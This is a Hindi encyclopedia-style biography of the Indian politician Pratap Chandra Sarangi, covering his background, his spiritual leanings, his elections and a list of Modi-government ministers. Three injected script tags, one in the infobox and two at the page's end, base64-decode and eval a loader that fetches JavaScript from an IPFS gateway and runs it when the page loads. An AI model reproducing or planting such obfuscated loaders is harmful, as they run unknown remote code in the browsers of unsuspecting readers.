प्रताप चन्द्र सारंगी
प्रताप चन्द्र सारंगी
| |
पूरा नाम | प्रताप चन्द्र सारंगी |
जन्म | 4 जनवरी, 1955 |
जन्म भूमि | गोपीनाथपुर ग्राम, बालासोर, ओडिशा |
अभिभावक | पिता- गोविन्द चन्द्र सारंगी |
नागरिकता | भारतीय |
प्रसिद्धि | समाज सेवक व राजनेता |
पार्टी | भारतीय जनता पार्टी |
पद | सांसद, केन्द्रीय राज्य मंत्री |
कार्य काल | 23 मई, 2019 से |
शिक्षा | कला स्नातक |
विद्यालय | फकीर मोहन महाविद्यालय[१] |
चुनाव क्षेत्र | बालासोर |
अन्य जानकारी | प्रताप चन्द्र सारंगी का बचपन से ही आध्यात्म की ओर झुकाव रहा। वह रामकृष्ण मठ में संन्यासी बनना चाहते थे। इसलिए कई बार पश्चिम बंगाल में हावड़ा स्थित बेलूर मठ में रहे। |
अद्यतन | 15:25, 25 मार्च 2020 (IST) <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
|
प्रताप चन्द्र सारंगी (अंग्रेज़ी: Pratap Chandra Sarangi, जन्म- 4 जनवरी, 1955, बालासोर, ओडिशा) भारत के सामाजिक कार्यकर्ता और राजनेता हैं। अपने विनम्र और सरल स्वभाव के कारण वे प्रसिद्ध हैं। वह कभी साधु बनना चाहते थे और एकांत जीवन बिताना चाहते थे, लेकिन उनका समाज के प्रति समर्पण और जनसेवा का भाव उनको नरेंद्र मोदी के मंत्रिमंडल में ले आया। प्रताप चन्द्र सारंगी लंबे समय तक राष्ट्रीय स्वयंसेवक संघ से जुड़े रहे। 2019 के लोकसभा चुनाव में उन्होंने बालासोर संसदीय सीट से बीजद प्रत्याशी रबींद्र कुमार जेना को 12,956 मतों से हरा दिया। भाजपा की राष्ट्रीय कार्यकारिणी के सदस्य प्रताप चन्द्र सारंगी को ओडिशा का मोदी भी कहा जाता है। राष्ट्रीय चुनाव लड़ने से पहले सारंगी 2004 से 2014 तक ओडिशा विधानसभा के सदस्य रहे। वे ओडिशा में बजरंग दल के प्रमुख रह चुके हैं।
परिचय
प्रताप चन्द्र सारंगी का जन्म 4 जनवरी सन 1955 को बालासोर के गोपीनाथपुर ग्राम के एक ब्राह्मण परिवार में हुआ था। उनके पिता का नाम गोविन्द चन्द्र सारंगी था। उन्होंने 1975 ई में उत्कल विश्वविद्यालय के अधीन बालेश्वर के फकीर मोहन महाविद्यालय से कला में स्नातक उपाधि प्राप्त की। प्रताप चन्द्र सारंगी अत्यन्त सरल जीवन जीते हैं। वे आने-जाने के लिए एक सायकिल का प्रयोग करते हैं और चुनाव प्रचार के लिए आटो रिक्सा का। वह अविवाहित हैं। उनकी विधवा मां का 2018 में निधन हो गया। वह अकेले ही रहते हैं और पूरे समाज को अपना परिवार मानते हैं। समाज सेवा उनका धर्म है। वह मानते हैं कि इसके लिए उपयुक्त प्लेटफार्म राजनीति ही है। सफेद दाढ़ी, सिर पर सफेद कम बाल, साइकिल, बैग उनकी पहचान है। संपत्ति के नाम पर छोटा सा घर है। किसी गरीब का कोई काम होता है तो वह सीधे प्रताप चन्द्र सारंगी की झोपड़ी में जा पहुंचता है।
संन्यासी बनने की इच्छा
प्रताप चन्द्र सारंगी का बचपन से ही आध्यात्म की ओर झुकाव रहा। वह रामकृष्ण मठ में संन्यासी बनना चाहते थे। इसलिए कई बार पश्चिम बंगाल में हावड़ा स्थित बेलूर मठ में रह चुके हैं। प्रताप चन्द्र सारंगी ने जब मठ के सन्यासियों से इच्छा जताई तो उन्होंने उनके बारे में जानकारी हासिल की। मठ को पता चला कि उनकी मां जीवित हैं और विधवा हैं, तो उन्होंने सारंगी से आग्रह किया कि वह घर लौटकर मां की सेवा करें। इस पर प्रताप चन्द्र सारंगी गांव लौट आए और मां के साथ समाज की भी सेवा करने लगे।
एक प्रसंग
'ओडिशा के मोदी' के नाम से मशहूर बालासोर के सांसद प्रताप चन्द्र सारंगी की कई ऐसी बातें हैं, जो उनके सरल स्वभाव को दर्शाती हैं। उनसे जुड़ा एक क़िस्सा है। 2009 में जब वह ओडिशा में विधानसभा चुनाव लड़ रहे थे तो बीजेपी ने उन्हें टिकट दिया था, लेकिन वह टिकट ही खो गया। बावजूद इसके उन्होंने पार्टी से दूसरा टिकट नहीं मांगा और निर्दलीय ही पर्चा भर दिया। टिकट खोने का कारण भी अलग है। जब वह पब्लिक ट्रांसपोर्ट की बस में सफर कर रहे थे तो जेब से टिकट गिर गया, जो बाद में मिला ही नहीं।
लोकसभा सांसद
बालासोर से लोकसभा सांसद चुने जाने से पहले प्रताप चन्द्र सारंगी 2004, 2009 में निलागिरी विधानसभा सीट से बतौर विधायक जीत दर्ज कर चुके हैं। 2004 में बीजेपी के टिकट से तो 2009 में निर्दलीय के तौर पर। नरेंद्र मोदी ने उन्हें अपने कैबिनेट में जगह दी है और राज्य मंत्री बनाया है। जब वह शपथ लेने आए थे तो राष्ट्रपति भवन का प्रांगण तालियों से गूंज उठा था। सोशल मीडिया पर भी उनकी काफी चर्चा रही। प्रताप चन्द्र सारंगी हिंदी-ओड़िया-संस्कृत भाषा में निपुण हैं। अपने क्षेत्र में वह साइकिल से ही सफर करते हैं। चुनाव में भी वह एक ऑटो रिक्शा पर अपना प्रचार करते हुए देखे गए थे। उनकी इसी सादगी की वजह से लोग उन्हें 'ओडिशा का मोदी' भी कहते हैं। वह कभी जानवरों की सेवा करते हुए नजर आते हैं तो कभी किसी गुफा में साधना में लीन। उनकी इस सादगी के लोग मुरीद हो गए हैं। चुनाव जीतने के बाद भी उनकी जिंदगी में बहुत बदलाव नहीं आया है। जब उन्होंने बीजेपी के टिकट पर 2004 और 2009 में विधानसभा चुनाव जीता था, तब भी वह उसी सादगी के साथ जीते रहे। बताया जा रहा है कि उन्होंने अपने चुनाव प्रचार में बिल्कुल खर्च नहीं किया।
|
|
|
|
|
टीका टिप्पणी और संदर्भ
- ↑ उत्कल विश्वविद्यालय के अधीन
संबंधित लेख
नरेन्द्र मोदी का कैबिनेट मंत्रिमण्डल
क्रमांक | मंत्री नाम | मंत्रालय |
---|
प्रधानमंत्री | ||
---|---|---|
नरेन्द्र मोदी | 1. कार्मिक, लोक शिकायत एवं पेंशन मंत्रालय 2. परमाणु ऊर्जा विभाग | |
कैबिनेट मंत्री | ||
1. | राजनाथ सिंह | रक्षा मंत्रालय |
2. | अमित शाह | 1. गृह मंत्रालय 2. सहकारिता मंत्रालय |
3. | नितिन जयराम गडकरी | सड़क परिवहन एवं राजमार्ग मंत्रालय |
4. | निर्मला सीतारमण | 1. वित्त मंत्रालय 2. कारपोरेट कार्य मंत्रालय |
5. | नरेन्द्र सिंह तोमर | कृषि एवं कृषक कल्याण मंत्रालय |
6. | सुब्रह्मण्यम जयशंकर | विदेश मंत्री |
7. | अर्जुन मुंडा | जनजातीय कार्य मंत्री |
8. | स्मृति जुबिन ईरानी | महिला एवं बाल विकास मंत्री |
9. | पीयूष गोयल | 1. कपड़ा मंत्रालय 2. वाणिज्य और उद्योग मंत्रालय |
10. | धर्मेन्द्र प्रधान | 1. शिक्षा मंत्रालय 2. कौशल विकास और उद्यमिता मंत्रालय |
11. | प्रह्लाद जोशी | 1. संसदीय मामलों के मंत्री 2. कोयला मंत्रालय |
12. | नारायण तातू राणे | सूक्ष्म, लघु एवं मध्यम उद्यम मंत्री |
13. | सर्बानन्द सोनोवाल | 1. बंदरगाह, नौवहन और जलमार्ग मंत्रालय 2. आयुष मंत्रालय |
14. | मुख़्तार अब्बास नक़वी | अल्पसंख्यक मंत्रालय |
15. | वीरेन्द्र कुमार खटीक | सामाजिक न्याय और अधिकारिता मंत्रालय |
16. | गिरिराज सिंह | 1. ग्रामीण विकास मंत्रालय 2. पंचायती राज मंत्रालय |
17. | ज्योतिरादित्य एम. सिंधिया | नागरिक उड्डयन मंत्रालय |
18. | रामचंद्र प्रसाद सिंह | इस्पात मंत्रालय |
19. | अश्विनी वैष्णव | 1. रेल मंत्रालय 2. संचार मंत्रालय |
20. | पशुपति कुमार पारस | खाद्य प्रसंस्करण उद्योग मंत्रालय |
21. | गजेंद्र सिंह शेखावत | जल शक्ति मंत्रालय |
22. | किरण रिजिजू | कानून और न्याय मंत्रालय |
23. | राजकुमार सिंह | 1. विद्युत मंत्रालय 2. नवीन और नवीकरणीय ऊर्जा मंत्रालय |
24. | हरदीप सिंह पुरी | 1. पेट्रोलियम एवं प्राकृतिक गैस मंत्रालय 2. आवास और शहरी मामलों के मंत्रालय |
25. | मनसुख मंडाविया | 1. स्वास्थ्य और परिवार कल्याण मंत्रालय 2. रासायनिक उर्वरक मंत्रालय |
26. | भूपेन्द्र यादव | 1. पर्यावरण, वन और जलवायु परिवर्तन मंत्रालय 2. श्रम और रोजगार मंत्रालय |
27. | महेंद्र नाथ पाण्डेय | भारी उद्योग मंत्रालय |
28. | पुरुषोत्तम रूपाला | मत्स्य पालन, पशुपालन और डेयरी मंत्रालय |
29. | जी. किशन रेड्डी | 1. संस्कृति मंत्रालय 2. पर्यटन मंत्रालय |
30. | अनुराग ठाकुर | 1.सूचना और प्रसारण मंत्रालय 2. युवा मामले और खेल मंत्रालय |
राज्य मंत्री (स्वतंत्र प्रभार) | ||
1. | राव इन्द्रजीत सिंह | 1. सांख्यिकी और कार्यक्रम कार्यान्वयन मंत्रालय के राज्य मंत्री (स्वतंत्र प्रभार) 2. योजना मंत्रालय |
2. | जितेन्द्र सिंह (भाजपा) | 1. विज्ञान और प्रौद्योगिकी मंत्रालय के राज्य मंत्री (स्वतंत्र प्रभार) 2. पृथ्वी विज्ञान मंत्रालय के राज्य मंत्री (स्वतंत्र प्रभार) |
राज्य मंत्री | ||
1. | श्रीपद येस्सो नायक | 1. बंदरगाह, जहाजरानी और जलमार्ग मंत्रालय में राज्य मंत्री 2. पर्यटन मंत्रालय में राज्य मंत्री |
2. | फग्गन सिंह कुलस्ते | 1. इस्पात मंत्रालय में राज्य मंत्री 2. ग्रामीण विकास मंत्रालय में राज्य मंत्री |
3. | प्रहलाद सिंह पटेल | 1. जल शक्ति मंत्रालय में राज्य मंत्री 2. खाद्य प्रसंस्करण उद्योग मंत्रालय में राज्य मंत्री |
4. | अश्विनी कुमार चौबे | 1. उपभोक्ता मामले, खाद्य और सार्वजनिक वितरण मंत्रालय में राज्य मंत्री 2. पर्यावरण, वन और जलवायु परिवर्तन मंत्रालय में राज्य मंत्री |
5. | अर्जुन राम मेघवाल | 1. संसदीय कार्य मंत्रालय में राज्य मंत्री 2. संस्कृति मंत्रालय में राज्य मंत्री |
6. | जनरल (सेवानिवृत्त) वी. के. सिंह | 1. सड़क परिवहन और राजमार्ग मंत्रालय में राज्य मंत्री 2. नागर विमानन मंत्रालय में राज्य मंत्री |
7. | कृष्ण पाल गुर्जर | 1. विद्युत मंत्रालय में राज्य मंत्री 2. भारी उद्योग मंत्रालय में राज्य मंत्री |
8. | रावसाहेब दानवे | 1. रेल मंत्रालय में राज्य मंत्री 2. कोयला मंत्रालय में राज्य मंत्री |
9. | रामदास अठावले | सामाजिक न्याय और अधिकारिता मंत्रालय में राज्य मंत्री |
10. | साध्वी निरंजन ज्योति | 1. उपभोक्ता मामले, खाद्य और सार्वजनिक वितरण मंत्रालय में राज्य मंत्री
2. ग्रामीण विकास मंत्रालय में राज्य मंत्री |
11. | डॉ. संजीव कुमार बालयान | पशुपालन, मत्स्य पालन और दुग्ध उत्पादन मंत्रालय में राज्य मंत्री |
12. | नित्यानंद राय | गृह मंत्रालय में राज्य मंत्री |
13. | पंकज चौधरी | वित्त मंत्रालय में राज्य मंत्री |
14. | अनुप्रिया सिंह पटेल | उद्योग एवं वाणिज्य मंत्रालय में राज्य मंत्री |
15. | एस. पी. सिंह बघेल | न्याय और कानून मंत्रालय में राज्य मंत्री |
16. | राजीव चंद्रशेखर | 1. कौशल विकास और उद्यमिता मंत्रालय में राज्य मंत्री 2. इलेक्ट्रॉनिक्स और सूचना प्रौद्योगिकी मंत्रालय में राज्य मंत्री |
17. | शोभा करंदलाजे | कृषि और किसान कल्याण मंत्रालय में राज्य मंत्री |
18. | भानु प्रताप सिंह वर्मा | लघु, मध्यम और सूक्ष्म उद्योग मंत्रालय में राज्य मंत्री |
19. | दर्शना जरदोश | 1. कपड़ा मंत्रालय में राज्य मंत्री
2. रेल मंत्रालय में राज्य मंत्री |
20. | वी. मुरलीधरन | 1. विदेश मंत्रालय में राज्य मंत्री 2. संसदीय कार्य मंत्रालय में राज्य मंत्री |
21. | मीनाक्षी लेखी | 1. विदेश मंत्रालय में राज्य मंत्री 2. संस्कृति मंत्रालय में राज्य मंत्री |
22. | सोम प्रकाश | वाणिज्य और उद्योग मंत्रालय में राज्य मंत्री |
23. | रेणुका सिंह सरुता | आदिवासी मंत्रालय में राज्य मंत्री |
24. | रामेश्वर तेली | 1. पेट्रोलियम और प्राकृतिक गैस मंत्रालय में राज्य मंत्री 2. श्रम और रोजगार मंत्रालय में राज्य मंत्री |
25. | कैलाश चौधरी | कृषि और किसान कल्याण मंत्रालय में राज्य मंत्री |
26. | अन्नपूर्णा देवी यादव | शिक्षा मंत्रालय में राज्य मंत्री |
27. | ए. नारायणस्वामी | सामाजिक न्याय मंत्रालय में राज्य मंत्री |
28. | कौशल किशोर | शहरी विकास एवं आवास मंत्रालय में राज्य मंत्री |
29. | अजय भट्ट | 1. रक्षा मंत्रालय में राज्य मंत्री 2. पर्यटन मंत्रालय में राज्य मंत्री |
30. | बी. एल. वर्मा | 1. उत्तर पूर्वी क्षेत्र के विकास मंत्रालय में राज्य मंत्री 2. सहकारिता मंत्रालय में राज्य मंत्री |
31. | अजय कुमार मिश्रा | गृह मंत्रालय में राज्य मंत्री |
32. | देवुसिंह चौहान | संचार मंत्रालय में राज्य मंत्री |
33. | भगवंत खुबा | 1. नवीन और नवीकरणीय ऊर्जा मंत्रालय में राज्य मंत्री 2. रसायन और उर्वरक मंत्रालय में राज्य मंत्री |
34. | कपिल पाटिल | पंचायती राज मंत्रालय में राज्य मंत्री |
35. | प्रतिमा भौमिक | सामाजिक न्याय और अधिकारिता मंत्रालय में राज्य मंत्री |
36. | सुभाष सरकार | शिक्षा मंत्रालय में राज्य मंत्री |
37. | डॉ. भागवत किशनराव कराड | वित्त मंत्रालय में राज्य मंत्री |
38. | राजकुमार रंजन सिंह | 1. विदेश मंत्रालय में राज्य मंत्री 2. शिक्षा मंत्रालय में राज्य मंत्री |
39. | डॉ. भारती प्रवीण पवार | स्वास्थ्य एवं परिवार कल्याण मंत्रालय में राज्य मंत्री |
40. | बिश्वेश्वर टुडू | 1. जनजातीय मामलों के मंत्रालय में राज्य मंत्री 2. जल शक्ति मंत्रालय में राज्य मंत्री |
41. | शांतनु ठाकुर | बंदरगाह, जहाजरानी और जलमार्ग मंत्रालय में राज्य मंत्री |
42. | डॉ. मुंजापारा महेंद्रभाई | 1. महिला एवं बाल विकास मंत्रालय में राज्य मंत्री 2. आयुष मंत्रालय में राज्य मंत्री |
43. | जॉन बारला | अल्पसंख्यक मंत्रालय में राज्य मंत्री |
44. | एल. मुरुगन | 1. मत्स्य पालन, पशुपालन और डेयरी मंत्रालय में राज्य मंत्री 2. सूचना एवं प्रसारण मंत्रालय में राज्य मंत्री |
45. | निसिथ प्रमाणिक | 1. गृह मंत्रालय में राज्य मंत्री 2. युवा मामले और खेल मंत्रालय में राज्य मंत्री |
वर्णमाला क्रमानुसार लेख खोज
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>